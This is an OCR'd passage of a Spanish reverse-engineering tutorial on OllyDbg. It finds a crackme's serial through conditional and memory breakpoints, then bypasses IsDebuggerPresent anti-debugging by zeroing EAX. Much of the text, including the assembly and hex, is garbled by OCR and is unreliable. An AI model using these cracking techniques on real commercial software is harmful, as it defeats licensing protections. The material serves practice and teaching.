3045054 | .idata | Import |: 
l 
( 


3045C154|. idata Import «GetCommandLineA 
3I045C2A8|. idata Import .«GetCPInfo 

30450390! . idata Import tCurrentPositionEx 
3045C2A4|.idata | Import .«GetCurrentProcessId 
3045C0FO|.idata | Import «GetCurrentThreadId 
3045C2A0|.idata | Import .«GetCurrentThreadId 
30450598 | .idata | Import etCursor 
3045C0594|.idata | Import etCursorPos 
30450590 |. ¡data Import jet DC 

3045C58C|. ¡data Import ¡et DCEx 
3045C38C|.idata | Import GetDCOrgEx 
3045C588|.idata | Import GetDesktopllindow 
3045C380|.idata | Import «GetDevicelaps 
3045C388|.idata | Import «GetDIBColorTable 
3045C384|.idata | Import «GetDIBits 
3IB45C29C|.idata | Import «GetDiskFreeSpaceA 


3045C37C|. idata Import 
3045C378| .idata | Import 
30450374 | .idata | Import 
30450188! .idata | Import 


«GetEnhMetaFileBits 
«GetEnhMetaFi leHeader 
tEnhMetaFilePaletteEntries 
«GetFileSize 


Uff muchísimas para mi gusto, bueno corrámoslo para llegar a la ventana donde se ingresa el serial, 
apreto F9. 


- Crackme 3 b... [2 [fx] 
Nombre PESETA 


Codigo |... 


Vemos que no hay botón de registro, así que tipeo un nombre completo 


“- Crackme 3 b... Ale 
Nombre [Narvaja 


Codigo la 


Y pondré un BPX CONDICIONAL LOG en TranslateMessage, primero coloco un BPX común 


w| BP address, string - 


Module C:LArchivos de programa Yahoo! Messengertidle. dll 


Y cuando voy a acceder al crackme, para solo en el BP allí lo edito. 


—i - - ' ' 


Backup 
Copy » 
0FS34 3E7EB200 Binary » 
6A a 

Assemble Space 
Label 
Comment 


56 
ES BEÉFEFFFF 
SE 


Toggle 
Run trace Conditional 
Pe MA 
Enlinwe in Dima » Marnrv. nn arrasa 


Si alguien no se acuerda el valor correspondiente al WM que vamos a usar, pues vamos a la ventana W, 
que nos muestra las ventanas del programa. 


[w] File View Debug Plugins Options Window Help 


CKIEJO En eje eel E 1/E/m]T/w)H] c] 


MOBEBESS Crackme 3 by stzawei Topmost 

DOBSM6S2 DODEG6SS =Mandle | 54810000 | 00000200 Main Ba42 
BOBDOES4 BODEGESS =Handle | 548100C0| DOBBBZ00 Ba42 
BOBFBE4C crackme_4stz Topmost 94CA0000 | 00000100 Bu 


Y nos aparece la lista de ventanas, en cualquiera, total es solo para averiguar el valor numérico, hacemos 
click derecho 


Ltrite 
Crackme 3 by stzwei 


DIY LE E 1 
16CF0000/ 000160190/ Ma 
54010000 | 0O0BB200| Ma 
54010000 | DO0BB200 UE 
El 


Topmost 
BOBEGBESS 
BBBEDESS 


Actualize 


=Handle 
=Handle 


crackme_4st2 


Follow ClassProc 

Toggle breakpoint on ClassProc 

Conditional log breakpoint on ClassProc 
ge breakpoint on ( ñ 


Copy to clipboard » 
Snrt bue > 


Y nos aparece la ventana de los MESSAGE BREAKPOINTS con el menú desplegable de los WM 


Set breakpoint on WinProc 


Messages: | Any message 


(* Break on any window 
C Break on all windows with same title 


€ Break on actual window only (invalid in next session] 


Never Onmessage Pass count [dec.] 


Pause program: E aj 0 


Log W'inProc arguments: (e 5] 


TF Sort messages by name Cancel 


Buscamos en la lista WM_KEYUP 


iS | Any message y ] 


rn E nr 


o 
5 
-»e 
E 
(7 
m 
— 
o 
Í 
m 
o 
AR 
192 


BF2 EM_GETSTATE 
BFS EM_SETSTATE 
OF4 EM_SETSTYLE 
BFS BM_CLICK 

BF6 BM_GETIMAGE 
z BM_SETIMA 


4 WMN_SYSKEYDOUN 
5 WM_SYSKEYUP 
6 WM_SYSCHAR 
107 lM_SYSDEADCHAR 
109 WM_WNT_CONVERTREQUESTEX 
109 WMN_CONVERTREQUEST 


Proc arguments: 


Jr poda pu 
paa 


Vemos que es 101, así que cancelamos todo esto que fue solo para averiguar ese valor numérico y 
volvemos al BREAKPOINT CONDICIONAL LOG en TranslateMessage. 


Expression: 


y ] = [msal y ] 
Decode value of expression as: [Assumed by expression y | 


Never  Oncondition Always Pass count [dec.] 


Pause program: 2 Oj a D. 


| 
| Log value of expression: 2 y (e 


Log function arguments: e E) al De 


If program pauses, pass following commands to plugins: 


Cancel | 


Y allí coloco MSG==101 (recordar el doble signo igual), también podía haber escrito allí si no encuentro 
el valor, MSG==WM_KEYUP y funcionara, pero a mi me gusta mas usar valores numéricos, cada uno 
puede hacer como quiera en ese punto. 


Bueno allí quedo nuestro BPX transformado en CONDICIONAL LOG (color rosa) 


nom Y mevr IA e LA dl Y A mp 


EXE ea] vie ESE al + ijejmtiwja] 


mMOU 
55 PUSH Ep 
8BEC MOU EBP,ESP 


56 PUSH ESI 
8B75 u8 MOU ESI, DWORD PTR_SS: [EBP+8] 


66:817E 083 ESBI CMP WORD PTR DS: [ESI+8],0ES 
A 


56 
ES BEFEFFFF 
SE 


XOR_EAX, ERX 


Demos RUN y tecleo la primera letra de mi serial falso 


* Crackme 3 b... a 


Nombre [Narvaja 
Codigo El 


Y allí se detiene el OLLYDBG en el BPX CONDICIONAL. 


aro to TranslatelMessage from crackme_.0b4 
plisa = WM_KEVUP hw = 80652 (class="TEdit”) 


70920738 | ntdll.7C920738 
FFFFFFFF 


Anna aro 


> 


ey 29 1D") KeyData = CODAOAO1 


SULcFrOS 
DOIZFFES 


Vemos allí los parámetros de la api, en 12ff78 hay una estructura que guarda los valores del la tecla que 
aprete en este caso 39, que corresponde al numero 9. 


Veamos en el DUMP dicha posición de memoria, haciendo click derecho en dicha dirección y eligiendo 
FOLLOW IN DUMP. 


5 


BB12FFOD 
7C920738 


0B441A6F 
pOBB3nESs2 


CoBADOG1 
D1BE7A76 


7FFDFOGO 
BB441C7A 
OB12FFB4 
BB441C9E 


BB12FFAC 


11458394 
BB12FFEO 


DO12FFFO 


70920738 
FFFFFFFF 
7FFDFODO 
8054A938 
OBÍ2FFCS 
84F37778 
FFFFFFFF 
7CS399F3 


7C816D4F || 


- Areak with ennritinn 


ooo 
da e 


Daba 


ea 


56 63 66 61 61 66 Bn 640.90. . 


CALL to TranslateMessage from crac 


Address 

Show ASCII dump 
Show UNICODE dump 
Lock stack 


Copy to clipboard Ctri+C 
Modify 

Edit Ctrl+E 
Push DWORD 

Pop DWORD 

Search for address 

Search for binary string Ctrl+B 


Go to ESP + 
Go to EBP 
Go to expression CtrkG 


Vemos que conseguimos parar y identificar cuando ingresa el byte el problema es que es un programa en 
DELPHI lo cual veremos mas adelante y si pongo un BPM ON ACCESS en ese byte, dará mil vueltas 
antes de llegar a la comparación, por lo cual, el método que vimos la vez anterior se aplica mucho mejor 
aquí y antes de enloquecer pues lo usaremos, de cualquier forma ya saben como parar el programa cuando 
ingresa por teclado, y como localizar el byte, seguramente en otro crackme que no sea en DELPHI, se 
podrá seguir mas fácilmente con un BPM ON ACCESS en el mismo, hasta la comparación. 


Y doy RUN 


Crackme 3 b... E [10 [X] 


Nombre [Narvaja 
Codigo [9e9s 


Tipeo 9898, iré a la ventana M y buscare en toda la memoria 


IIA 


nep 


L/E/m|1/w)H]c/7/x]8/Rr]-s] ¿3131 ?| 


Ss |InitialiMapped as 


Address 
0010090 
BOB20000 
B0128000 
Ba12C000 
pa130090 


DO26000a 
pO230000 
BO2CaBBa 
B0310000 
DO320000 
0370090 


CAADOSArArArA 


B1008 
B0001009 
B0001008 
D0004900 
DO0B30Da 


D0016008 
1003000 
B0041008 
5151351512 
D0041008 
00001009 


CArararad rarara 


Priv|RW Gt 
stack of ma Priv|Rl Gt 


Actualize 
Dump in CPU 
Durnp 


Map [RW ) 

Map |R 32mnicode 
Map |R 32nlocale. 
Map Search next Ctrl 32msortkey 


32nsorttbl 


Set break-on-access F2 


Enter binary string to search for 


Aascil [9898 
UNICODE | 


HEX +04 [39 38 39 38 


<< 
[42 Entire block salt 
ÍV' Case sensitive Cancel | 


Y busco la string 9898 


00 60 66 060 60 66 66 DO 66 aa 
0 66 06 00 60 66 06 60 66 66 0N BO 66 aa .. .. 
AB AB AB AB AB AB AB AB 00 06 06 60 14 60 . 
7 66 67 66 309 67 13 06 BB 66 0 Ba FS 10 Bet... .OH0. 
DIA TA 14 Ma aa aa aña aña aña 


A rar Lim zm 


La primera ocurrencia es en el stack apreto CTRL + L varias veces a ver cuantas aparece en el mismo. 


Una zona vez ya que nos aparece en amarillo la palabra ITEM NOT FOUND debajo, salgamos de esta 
sección y volvamos a la ventana M 


B0010000| 00001000 Priv! Ru Ru 
B0B20000 | 00001000 Priv Ru Ru 
90128000) 00001000 Priv[(RW  GuajRW 
60120000 | 60004000 stack of ma|Priv/RW Gua Ru 
90130000) 00003000 Map |R R 
B0140000| 00012000 Priv Ru 0 
10240000 4BABEBaa Priv/Ru Ru 
B0250000 | 00003005 Map ¡RU Ru ! z y 
B0260000 | 00016000 Map |R R ADevicerHarddiskUo lume1 WINDOWS +system32sun i 
560220000 | 60030000 Map |R R Dev icerHarddiskUo lume 1 INDOWS+system32s Loc 
DO02C0000| 00041000 Map |R R MevicerHarddiskUo lume1sWINDOWS+system32wsor 
50310000 | 00005090 Map |R R xDevicerHarddiskUolume1sWINDOWS sy stem32usor 
B0320000| 00041000 Map |R R 
99379999] eese1899 Rriv| Ru RU 


Llego hasta aquí buscando, así que sigamos para abajo con CTRL + L 


Y Y —S pS Pat A PS A A 1.0 O A O A A O A A A a 


9398. .(.t14E. 10. 
FTirlalalalalals 
Colalalalalalals 


DO 


. -DO0ÍOA- «Cd 
««B...P..d....20 
«1. EJE. 16. > 
B| .EE.>18.87$.9.. 

Pé ATL A mia 


Allí aparece por primera vez en esta sección hagamos CTRL + L para ver si aparece de nuevo 
No, no aparece de nuevo si miro en la zona donde esta la ocurrencia 


aaa ales 
NacuBB..t.no.... 
*... 418518. .t... 
so... NaruhB.. 


METE Y TA 


DEDO O 


Veo un posible serial 418507, igual le pongo un BPM on ACCESS al lugar de la ocurrencia a ver si es 
este el que comparara. 


B7..*do.Mo.ET.. 
2098... t4E. 10. 
Cololalalals 


60 1E 95 00 F4 96 95 60 D4 54 
Ba Aa 20 aa 74 DA AR añ EA 0 


28 _ 
28 Backup a CUE Alli 
1 Copy » pr o. a 
63 ) . DB0tos- 

sa. Binary » 

EJ] 

E Breakpoint » li femor ny, ON ac 

| Search for » 

28/  Gotoaddress Ctri+G 


Doy RUN 


| lios ls] IM OMA ala 1) $ 1) 17 7 +14 p[p 
REP MOUS_DWORD PTR ES:CEDIJ,DWORD PTR DS:[ESI 
MOU ECX, EAX 

AND ECX, 3 
REP _MOUS BYTE_PTR ES: C[EDIJ,BYTE PTR DS: [ESI] 
POP EDI 
POP ESI 

MOU EAX, EBX 
POP EBX 


nan ar 


2 BBBBBBD? 
p0B0BBBi 
00140608 
ss 1s151515F4 
B012F090 
0012FBAD 
0014FBBS 
B09541B4 


Ri ff CECCECCEE 1 


Lo que vemos que cada vez que tipeo va copiando de nuevo mas abajo mi serial falso y cada vez lo va 
machacando con mi nombre, y con el carácter siguiente vuelve a copiar el serial bueno mas abajo y asi 
hasta que tipeo los 6 caracteres del serial falso y ahí si cuando están los 6 caracteres a la vista poniendo un 
BPM en ellos. 


Naruh6.. 


O 
4... 4185 


NarveB.. 


MDDo 


OBOROLAOR 


70013166 


nO. . Foo. 


a 
a 
a 
a 


A PA 
O 
ps 
1W..t... 


Narvaja. 


B. 
989898. . 


Para justo en la comparación 


MOU ECX, DWORD PTR DS: [ESI] 
MOU EBX,DWORD PTR DS: [EDI] 
CMP ECX, EBX 


DEC _EDX 


MOU ECX, DWORD PTR DS: [ESI+4] 
MOU EBxX,DWORD PTR DS: [EDI+4] 
CMP ECX, EBX 


ADD ESI,S 
ADD EDI,S 
DEC EDX 


ADD ESI,4 
ADD EDI. 4 


; BOBBDBDO 
38393839 
B0BB0BB1 
Ba951304 
BB12F3AS 
BB12F3E4 
10954254 
10954240 


, sepia 


BO: 
FEFFFFE) 


IDA A 


¡DANDO 


1151515151515) 


mí 


mr 


A a] ' 1 
ma 


Pa - 1 he % - 
Nombre [Nesvejo me 
Codigo e 


Information 


Vemos que a pesar de todo es un crackme difícil ya que es un momento justo, que hay que agarrarlo ya 
que va variando la posición del serial falso y hay que agarrarlo con el BPM justo cuando recién lo escribe 


en su nueva posición, para poder parar en la comparación. 


Otra posibilidad es la siguiente veo que con 4 bytes aparece esto 


418350. . 
DO 
....Nary 
DO..t... 
a PO 
4185IFB... 


nunbass 
418578... 


(8 
.+1$.0”0 
.7"0.53+ 


Pues voy poniendo BPM ON WRITE en la zona justo abajo, donde va a escribir cuando ingrese 
próximo carácter 


Copy 
Binary 


Search for 
Follow DWORD in Dump 
Go to » 


po 


Remove memory break 


Hardware, on access 
Hardware, on write 
Hardware, on executior 


w Hex > 
Text > 
Short » 
> 

> 


Long 

Float 

Disassemble 

Special » 


Appearance 


asado 


Bi 39 
F4 12 08 D6 26 40 


a 260/60 78 


Seguro cuando ingrese el próximo carácter, lo escribirá aquí, así que doy RUN 


el 


A IS II 


4 +80] 3] +) 1/e/m)T]/wn]c//]K/B/r] 


REP MOUS DWORD PTR ES: CEDIJ,OWORD PTR DS: [ESI 
ECX, ERX 

ECx,3 

ESI,3 


EDI,3 
MOUS BYTE PTR ES:[EDIJ,BYTE PTR DS: [ESI] 


EDI 
ESI 


[* 8 B_ESP,83 
- 12 FTSTP QMNAN PTR SS: FFSP1 


mass llas. 


*...Naru 
EXNCRAAA 


.6D.... 


ad .. 


MOU EAX, ECX 
R ECx,2 
REP MOUS DWORD PTR ES:C[EDIJ,DWORD PTR DS: [ESI 
MOU ECX, EAX 
ECx,3 
REP MODUS BYTE_PTR ES:[EDIJ,BWTE PTR DS: [ESI] 


POP EDI 
POP ESI 


F3:A4 
ESFEFFFF 


Y luego para cuando copia el serial falso, ahora si que paro apenas se copio, puedo ponerle un BPM on 
ACCESS al serial falso y al dar RUN para justo en la comparación, nuevamente. 


ar 200) “5 *3 $43) Y] MAA 


> PBBDE MOU ECx,DWORD PTR DS: [ESI] 
E MOU EBX, DWORD PTR DS: [EDIJ 


cap EC EEX 


DEC _EDXx 
MOU ECX, DWORD PTR DS: CEDI +A 


MOU EBxX,DWORD PTR DS: LEDI+ 
CMP ECX, EBX 


ADD ESI,8S 
ADD EDI,S 
DEC EDXx 


1 
E 


A 


Bueno creo que este fue un caso difícil para cualquier método por lo movedizo de la zona donde guarda el 
serial. 


Bueno les dejare un ejercicio, este será hallar el serial del CRACKME DE CRUEHEAD 2, esto será el fin 
del primer capitulo de la INTRODUCCIÓN a partir de la parte 19 empezaremos con nuevos temas, y el 
resolver este sencillo crackme será como la graduación del primer capitulo, recuerden que para abrir el rar 
de la parte 19 necesitaran del serial verdadero del crackme de cruehead 2 es bien sencillo. 


Hasta la parte 19 
Ricardo Narvaja 
19 de diciembre de 2005 


INTRODUCCION AL CRACKING EN OLLYDBG parte 19 


DETECCION DEL OLLYDBG - IsDebuggerPresent 


Como dijimos la parte anterior, nos concentraremos en la forma de evitar manualmente y por 
medio de plugins la detección de OLLYDBG por medio del programa que esta siendo debuggeado, de 
forma tal de poder trabajarlo tranquilamente ya que la mayoría de los programas, cuando detectan que hay 
un debugger trabajando sobre ellos, se cierran o comienzan a funcionar en forma diferente por lo cual 
hay que lograr evitar por todos los medios la detección de OLLYDBG por parte del programa victima. 


Esta primera parte tratara sobre la detección por medio de la api IsDebuggerPresent, la cual es la 
mas comun de todas. 


Para ello utilizaremos el Crackmel.exe que esta adjunto a esta leccion, lo arrancamos en 
OLLYDBG. 


OllyDbg - Crackme1.exe - [CPU - main thread, module Crackme 
[e] File View Debug Plugins Options Window Help 


AAA AE E 


prModule = N 
Es 6Fo40000 CALL <JMP.tkernel32.GetModu leHandleA> GetModu leHandleA 


CietCommandLineA 
itCommonControls 
BOBBBBDA 


£A BA PUSH BA 

ca 54314001 PUSH DWORD PTR DS: [403154] 

FF35 50314001 PUSH DWORD PTR DS: [403150] Aral = BOBBBBGa 

ES 06000000 | CALL Crackmel. 00401031 z E 
mt ode 

Es 39040008 | CALL <JMP.tkernel32.Ex itProcess> Ex itProcess 


Recordemos que mi OLLYDBG por ahora solo tiene el plugin COMMAND BAR, por lo cual, 
no tiene cargado ningún plugin que pueda evitar la detección por medio de la api IsDebuggerPresent, pero 
como funciona dicha detección? 


Si corremos el crackme con F9 vemos que no solo no abre la ventana del crackme si no que se 
cierra el programa. 


F35I 94uuv Lol 
FCW 627F Pr 


MENE 7CSIESIAJRETURN to ntdll.7CIIESIA 
—— TE , ¿CS1CASE| RETURN to kerne 132. 7CS1CASE 


ntdll.7C920738 


equivocas en una sola letra o num del Diao 


XOPE RICARDO: Lista 


OLLYDBG nos indica en la parte inferior que el programa termino, y ni siquiera vimos la 
ventana del crackme, jeje, que ocurre aquí, muy sencillo el crackme utiliza el método mas conocido para 
detectar que esta siendo debuggeado que es llamar a la api IsDebuggerPresent. 


Reiniciemos el crackme y veamos si la susodicha esta en la lista de las apis que utiliza la victima, 
haciendo click derecho en el listado y eligiendo .. 


VTyy y EPA 


[gliedule = NULL 
a GetModu leHandleA 
MOU DWORD PTR DS: [403150],EAxX 
da dLineA 
ha 72040000 itCommonControls 
añ rad = BABABBDA 
Eros 54314001 PUSH Elloro PTR-Nc.rano1ca1 [Ai = eee 209 
EE qe 
CALL Crackmel. 
59 Copy » 
ES 39040000 7 
Binary » 
Assemble Space 
Label y 
Comment y 
Breakpoint » 
Hit trace » E 
6s Barraaan | PUSH 7FOO » [DI_ZAPPLICATION 
dh Ba PUSH 0 Run trace 
ES E3030000 
Sale ico Ha pUcrO ETÉ | Neworigin here CtrGray* 
62 097FO000 |PUSH 7FOB » ÍDC_ARROW Yalw 
PUSH 8 Go to 
ES 9B030000 ; 
8945 EC MOU DWORD PTR Follow in Dump » 
OO vecallves CU € 
ES A7030000 Em EaIveS SEÑA 
PUSH 9 = — 
és FElbaaos [PUSH Crackmel. 
ess, sn es msle Findreferences to Name in all modules lx 
e A 


Vemos la lista de apis usadas 


la] 44) X] HD BODA ES mil JU 


Address (Section 
60402050 | .rdata pe 
B0402058| .rdata Import 
680402054 | .rdata 
B0402034| .rdata 
60402014 | .rdata 
66402018 | .rdata Impo: 
66402040 | .rdata Import 
60402048| .rdata Import 
BB40200C| .rdata Import 
600402008 | .rdata Import 
B6402030| .rdata Import 
66402000 | .rdata Import 
60402010) .rdata Import 
B64B202C| .rdata Import 
60402020! .rdata Import 
10402024 | .rdata Import 
BO0401000| text Export 
B0402028| .rdata 
BB40205C| .rdata 
0402064 | .rdata 
B0402038| .rdata 
BB40203C| .rdata 
00402040 | .rdata I 
90402044 | .rdata I 
00402060 | .rdata Import 


CreateDialogParamA 
DefllindowProcA 
Destroyllindow 
DispatchiMessageA 
.ExitProcess 

. GetCommandL ineA 


GetModu leHandl 
«GetVolumeInfor 
etllindowTextA 


tonA 


LoadIconA 
lessageBoxA 
ntryPoint> 
PostQuitMessage 
RegisterClassExA 
SendMessageA 
SetlindowTextA 
Sh owblindow 

Trans lateMessage 
Updat ell indow 
wsprintfA 


Y si parece que la usa jeje 
Pongamos un BP en dicha api a ver si para el programa cuando la utilice. 


' 
É 
D7 


3 
Command Bp IsDebuggerPresent y] 1 


Program entrv point 


Damos Run y para en la api 


[c] File View Debug e ls pablo Window Help 


MOU_EAX, DWORD PTR DS: CEAX+30] 


MOUZX EAX,BYTE PTR DS: [EAX+2] 
RETN 


SBISBIBAIFPCALL to IsDebuggerPresent from uxtheme.5B15B1B4 


aaa 
Y S|user32.77D6B0905 


3C| RETURN to uxtheme.SBISAF3C from uxtheme. SB1SAEF4 

Vemos en el stack que es una api sin parámetros, lo único que consulta es si el programa esta 
siendo debuggeado o no, para los que tienen dudas con alguna api y su funcionamiento, lo mejor es 
consultar el archivo WINAPIS32 que esta en mi http en herramientas. 


http://www.ricnar456.dyndns.org 


user:hola 
pass:hola 


y allí en la carpeta HERRAMIENTAS/V-W-X-Y-Z esta el archivo que contiene la 
especificación de las apis mas importante publicada por Microsoft, no están todas pero si la gran mayoría, 
el único problema es que esta en ingles, y es un poquito complicado de entender para el que no esta 
acostumbrado, pero a partir de ahora, para irnos acostumbrando, veremos las definiciones de las apis allí. 


http://www.ricnar456.dyndns.org/HERRAMIENTAS/V-W-X-Y-Z/winapi32%20NEW.rar 


user:hola 
pass:hola 


Name Y 


El archivo zip, contiene un archivo de extensión HLP que es el que nos interesa lo ejecutamos. 


Win32 SDK Reference Help Elal 
Archivo Edición Marcador Opciones Ayuda 
Contenido] Índice [ | Imprimir | | » 


accept 


The Windows Sockets accept function accepts a connection on a socket. 


SOCKET accept ( 

SOCKET s, 

struct sockaddr FAR* ada, 
int FAR* adarien 
) 


Parameters 


[in] A descriptor identifying a socket which ¡is listening for connections after a listen 


addr 
[out] An optional pointer to a buffer which receives the address ofthe connecting entity, as known to the 
communications layer. The exact format of the addr argument is determined by the address family established when the 
socket was created. 

addrlen 
[out] An optional pointer to an integer which coral the length ofthe address add. 


Remarks 
This rautine axtrarte the first eonnectian an the muene of nendina ronnertinns nn s creates a new anrket and ratura a 


Allí se abrió, ahora como buscamos la api que nos interesa? 


Archivo Edición Marcador Opciones Ayuda 


ma 
Emenad(udee PYo [mea] > 7] 


The Windows Sockets accept function accepts a connection on a socket. 


SOCKET accept ( 
SOCKET s, 
struct sockaddr FAR* adcr, 
int FAR* addrien 


Vamos a INDICE 


Temas de Ayuda: Win32 SDK Reference Help PX) 


Índice | Buscar | 


1 Escriba las primeras letras de la palabra que está buscando. 
| 


2 Haga clic en una entrada de Índice y después en "Mostrar". 


$ (Search for Disassembly Patterm)] 
% (Change Context] 

[Command Separator) 
[Non-Compound) FileT ype Key 

* (Comment) 

.ATTACH (Attach to Process] 
.cache (Cache Size) 

.EXE server 

list [Display Source/A.ssembly Listing) 
.logappend (Append Log file] 
.logclose (Close Log File) 

.logopen (Open Log File] 

«reboot [Reboot Target Machine] 
.reload [Reload Symbols] 
¿osystem> 


Imprimir Cancelar 


Allí en la barra a medida que vamos tipeando el nombre de la api, va buscando las que coinciden 
con la letra que tipeamos 


Temas de Ayuda: Win32 SDK Reference Help ll 


Índice | Buscar | 


1 Escriba las primeras letras de la palabra que está buscando. 
2 Haga clic en una entrada de Índice y después en "Mostrar". 
á DBCSLeadBytebls 


IsDebuagerPresent 
1D Meraron—] 


[ServerSecurity::ImpersonateClient 
IslImpersonating 
QueryBlanket 
RevertT oSelf 
IServiceProvider 


In Cancelar 


Bueno allí la hallamos hacemos doble click en IsDebuggerPresent 


IsDebuggerPresent [Guiskino], 


[New - Windows NT] 

The IsDebuggerPresent function indicates whether the calling process is running under the context of a debugger. 
This function is exported from KERNEL32.DLL. 

BOOL IsDebuggerPresent(VOID) 


AA _— == 


Parameters 
This function has no parameters. 


Return Value 
Ifthe current process is running in the context of a debugger, the return value is nonzero. 
Ifthe current process is not running in the context ofa debugger, the return value is zero. 


Remarks 


This function allows an application to determine whether or not it is being debugged, so that it can modify its behavior. For 
example, an application could provide additional information using the OutputDebugString function ¡fit is being debugged. 


See Also 
OutputDebugString 


Bueno allí esta la aclaración y traducimos 


La api IsDebuggerPresent indica cuando el proceso que la llamo, esta bajo el contexto de un 
debugger o sea siendo debuggeado. 


Luego dice que esta api o función es exportada por la KERNEL32.dll, que no tiene parámetros 
como vimos, y en RETURN VALUES o sea en valores de retorno, dice que si el programa esta siendo 
debuggeado el retorno es un valor distinto de cero, y si no lo esta es cero. 


Bueno esa información es muy importante, ejecutemos la api hasta el RET a ver donde devuelve 
la información. 


Plugins Options Window Help 


Run F9 huy 


Restart CtrHF2 


Close AIHF2 
Step into F7 
Step over F8 
Animate into CtrF7 


Animate over Ctri+F8 
e till return Ctrl+F9 


NtCL 
AltH+FO ÑS 


Execute till user code 


mou EA» DWORD_PTR DS: TEAX+307 
MOUZx EAX, BYTE PTR DS: [EAX+2] 


El que esta en rojo o sea que cambio es EAX, como casi todas las apis, devuelven en EAX el 
valor de retorno, así que EAX es igual a 1 lo cual le dice al programa que esta siendo debuggeado. 


Probemos que ocurre si lo cambiamos a mano y ponemos EAX=0 o sea que no esta siendo 
debuggeado. 


Modify EAX 
Hexadecimal 

Signed |] 
Unsigned ha] 
Char [w00 “fwxo0  fixoo fot 


co 


Registers (FPU) 
EAX MABABBDA 
ECX 77D6B065 user32 
(0:49 515151515]51515] 
EBX 4412F374 
ESP Ba12F32C 
EBP 0012F338 
ESI 00000061 
JEDI 0000BBBa 


EIP 7C312E10 kernel 


CO ES 00623 32bit 
PO CS 061B 32bit 
AG SS 0623 32bit 


Demos RUN ahora 
rd a] 
64: A1_ 10000009 mou EAX, DWORD PTR FS:[18] 
3840 MOU_EAX, DWORD_PTR_DS: [EAX+30] 
OFEG4D. ez MOUZX EAX,BYTE PTR DS: CEAX+2] 
C3 RETN 
90 NOP 
30 NOP 
qa NnP 


Vemos que vuelve a parar en la api, así que llegamos al ret nuevamente y cambiamos EAX a 
Cero. 


ty123's Crac... E] 


File Help 


1D No. [DSEDSB07 
Serial 


Vemos que el programa arranca, o sea que toda su detección se basa en dicha api, reiniciémoslo 
y cuando pare en IsDebuggerPresent, veamos que hace con el valor que le devuelve la api. 


[c] File View Debug Plugins Options Window Help 


ESER AL vel $0) ul + ujejm] 


mou IR Ta] PTR FS:[18] 
MOU_EAX, DWORD_PTR DS: [EAX+30] 
MOUZX EAX,BYTE PTR DS: [EAX+2] 


D0B00BD1 
ECx 77D6B005 user3 
EDx 90004B0a 
EBX BB12F374 
ESP 0B12F32C 
EBP B012F338 
ESI 6000BBB1 
EDI 600040B0a 


EIP 7C3812E10 kerne 


NN E A 


Allí esta, al llegar al RET, vale EAX=1, volvamos al programa con f8 nuevamente. 


OllyDbg - Crackme1.exe - [CPU - main thread, module uxtheme] 


[e] File View Debug Plugins Options Window  Hel 


SNE Est ESI 


6 

mod BuoRO PTR DS: [SB181BE8],ESI 
FF1S CC1B155B A IsDebuggerPresent 
25Ca TEST EAX, EAX 


OFES 9D6EB1OD 
SE ¿E gsthene.5B17205F ESI 
ES 3FFDFFFF. | JMP uxtheme.SB1SAFO? 
9 NOP 

NOP 

NOP 

NOP 

np 


Vemos que la primera vez no es llamado desde el mismo ejecutable si no de una dll que es 
uxtheme, demos RUN a ver la segunda vez que para en la api. 


8B49 38 Mou EAX, DWORD PTR_ DS: [EAX+38] 
ais B2 MOUZX ERX,BYTE PTR DS: [ERX+2] 


90 NOP 


PUSH 3ED 

PUSH DWORD PTR SS: [EBP+8] hbind 

CALL <JMP.£user32.GetDlaltem> GetDlgltem 
MOU DWORD PTR DS: ag ERX 

PUSH Crackmel. 6040 (núna Mail 


[hina = 3ED (1605. ) 


PUSH DWORD PTR DS: LAOS12F1 hlind = NULL 


O SetllindowTextA 


CHP robin 


MOU EAX, DWORD PTR SS: CEBP+10] 
AX, DFFFF 


AND 
car EAx, 2711 De 


Llega aquí, y allí hay un JE que testea si EAX se cero o no, veamos. 


OR EAX, EAX 


PUSH SED 
PUSH DWORD PTR SS: [EBP+8] 


CMP EAXx, 111 
MOU EAX, DWORD PTR SS: [EBP+10] 


AND EAXx, BFFFF 
CMP_EAxX, 2711 


A a 


3ED (1005. 3 
hlind 
GetDlgltem 


Text Lis 
Bl lnd = NULL 
SetWlindowTextA 


[hina = 


Vemos que el JE al ser EAX diferente de cero no salta, observamos también que si saltara 
continua la ejecución del programa con GetDlgltem leyendo de la ventana del crackme. 


Como no salta continua al JMP, el cual no es evitado, y aquí si se puede aplicar bien la palabra el 
crackme me tiro fuera, vemos que el JMP nos lleva bien lejos, posiblemente a cerrar el programa. 


MANPFDMNRMA- 


DMNADMAN 


F7S 14 
14 


FF? 
FE7E 


PUSH 3ED 
PUSH DWORD PTR SS: [EBP+8] 
MOU DWORD PTR DS: [40312F7,EAX 


PUSH Crackmel. 0403150 
PUSH DWORD PTR DS: [40312F] 


PUSH Crackmel. 00403019 
PUSH DWORD PTR SS: [EBP+8] 


PUSH DUORO PTR_SS: [EBP+8] 
A PTR DS: [403133], EAX 
PUSH DWORD PTR SS: [EBP+8] 
MOU_DWORD_PTR_DS: [403137], EAX 


PUSH DWORD PTR SS: [EBP+14] 
PUSH MARA PTR SS*TERP+141 


Vemos que va a la api PostQuitMessage miremos en el winapis32 


¿IK]B]R/-Js] 541?) 


hlind 


[nina = 
GetDlgltem 


Text = "" 
(nún: = NULL 
SetllindowTextA 


. Written by RadASM, thanks 


[eso 


SEE (1006. ) 
hlnd 


[EE = 
GetDlgltem 


hlund 


[nina = 3Fi (1009. ) 
GetDlgltem 


ExitCode = 6 
PostQu itMessage 


LP 


LP ar ar 


PostQuitMessage 


The PostQuitMessage function indicates to Windows that a thread has made a request to terminate (quit). lt is typically used 
in response to a WId_DESTROY message. 


VOID PostQuitMessage( 
int n£xitCode HHexit code 


h 


Parameters 


nExitCode 
Specifies an application exit code. This value is used as the wParam parameter of the Wid_QUIT message. 


Return Values 
This function does not return a value. 


Remarks 
The PostQuitMessage function posts a YM_QUIT message to the thread's message queue and retums immediately; the 
function simply indicates to the system that the thread is requesting to quit at some time in the future. 


When the thread retrieves the WIM_QUIT message from its message queue, it should exit its message loop and return control 
to Windows. The exit value retumed to Windows must be the wParam parameter of the WM_QUIT message. 


See Also 
GetMessage, PeekMessage, PostMessage, WWM_DESTROY, WM_QUIT] 


Traducción esta api pasa un mensaje para cerrar la ventana, jeje o sea esta api postea un mensaje 
WM_QUIT o sea es una indicación de que esta cerrando cosas, haciendo las valijas y se ira. 


Al volver del mismo 


al .. 12 2, E II A INIA ITA 
a > 6nA 40 PUSH BM [Ex tcode = 4 
a . ES 34010000 PostQu ¡tMessage 
a .«v(EB_ 15 
a 2 FET 14 PUSH DWORD PTR SS: CEBP+14] [Param 
a . |FF?S 10 PUSH DWORD PTR SS: CEBP+10] wParam 
